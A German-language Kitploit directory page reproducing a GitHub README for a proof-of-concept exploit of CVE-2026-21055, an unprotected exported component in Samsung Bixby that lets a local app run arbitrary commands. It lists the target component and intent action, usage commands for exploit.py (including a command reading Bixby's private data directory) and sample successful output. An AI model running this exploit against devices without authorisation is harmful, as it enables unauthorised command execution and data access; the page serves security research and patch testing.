Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
samsung-bixby-command-execution-cve-2026-21055-improper-component-export | Kitploit
Tools/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
Android-SicherheitSchwachstellenanalyseExploitationPenetrationstestsMobile SicherheitLernen & BildungBinary-Exploitation
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

CVE-2026-21055 PoC — Samsung Bixby: Unsachgemäßer Komponentenexport

Proof of Concept für CVE-2026-21055: Der unsachgemäße Export von Android-Anwendungskomponenten in Samsung Bixby vor Version 4.0.70.8 ermöglicht es lokalen Angreifern, beliebige Befehle mit Bixby-Berechtigung auszuführen.

Übersicht

Dieses Repository enthält zwei Python-Skripte:

  1. analyze_components.py — Analysiert eine dekompilierte AndroidManifest.xml, um exportierte Activities, Services, Receiver und Provider aufzulisten. Markiert Komponenten, die ohne Berechtigungsschutz exportiert wurden.

  2. exploit.py — Demonstriert den Intent-basierten Angriff, indem ein präparierter Broadcast-Intent über adb shell am an Bixbys exportierten Befehlsempfänger gesendet wird und so ein Befehl mit Bixbys Systemprivilegien ausgeführt wird.

Details zur Schwachstelle

FeldWert
CVE-IDCVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — Hoch
CWECWE-926 — Unsachgemäßer Export von Android-Anwendungskomponenten
Betroffene AppSamsung Bixby (com.samsung.android.bixby.agent)
Betroffene Versionen< 4.0.70.8
Behobene Version4.0.70.8
AngriffsvektorLokal (bösartige App auf demselben Gerät)
Erforderliche BerechtigungenKeine
BenutzerinteraktionKeine
AuswirkungBeliebige Befehlsausführung mit Bixby-Berechtigung

Voraussetzungen

  • adb (Android SDK Platform Tools) installiert und im PATH
  • Ein Samsung-Galaxy-Gerät mit aktiviertem USB-Debugging
  • Bixby-Version < 4.0.70.8 auf dem Zielgerät
  • Für die Komponentenanalyse: apktool installiert und im PATH

Verwendung

1. Bixbys exportierte Komponenten analysieren

Ziehe die Bixby-APK vom Gerät und dekompiliere sie:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

Führe das Analyse-Skript aus:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

Oder lasse das Skript automatisch dekompilieren:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. Exportierte Komponenten auf einem Live-Gerät auflisten

root@kitploit:~
$ python3 exploit.py --list

3. Den Exploit ausführen

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

Erwartete Ausgabe

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

Funktionsweise

  1. Komponentenexport: Bixby exportiert eine oder mehrere Komponenten (Services/Receiver), die Befehlsausführung oder Automatisierungsauslöser verarbeiten. Diese Komponenten werden mit android:exported="true", aber ohne android:permission-Attribut oder Laufzeit-Berechtigungsprüfungen exportiert.

  2. Intent-Zustellung: Jede App auf dem Gerät kann einen Intent an diese exportierten Komponenten senden. Der Intent enthält einen Aktions-String (z. B. ACTION_RUN_SHELL) sowie String-Extras mit dem auszuführenden Befehl und einem Ausgabedateipfad.

  3. Befehlsausführung: Bixbys exportierte Komponente empfängt den Intent, extrahiert den Befehl und führt ihn über Runtime.exec() oder einen ähnlichen Mechanismus aus. Der Befehl läuft im Prozesskontext von Bixby und erbt dabei sämtliche Systemrechte von Bixby.

  4. Keine Benutzerinteraktion: Der Exploit erfordert keine Benutzerinteraktion. Die bösartige App sendet den Intent still im Hintergrund.

Haftungsausschluss

Dieses PoC wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Teste nur auf Geräten, die dir gehören oder für die du eine ausdrückliche Testgenehmigung besitzt. Verwende diesen Exploit nicht gegen Geräte ohne Zustimmung des Eigentümers.

Quellen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • Samsung Mobile Security Bulletin (Juli 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
Tool herunterladen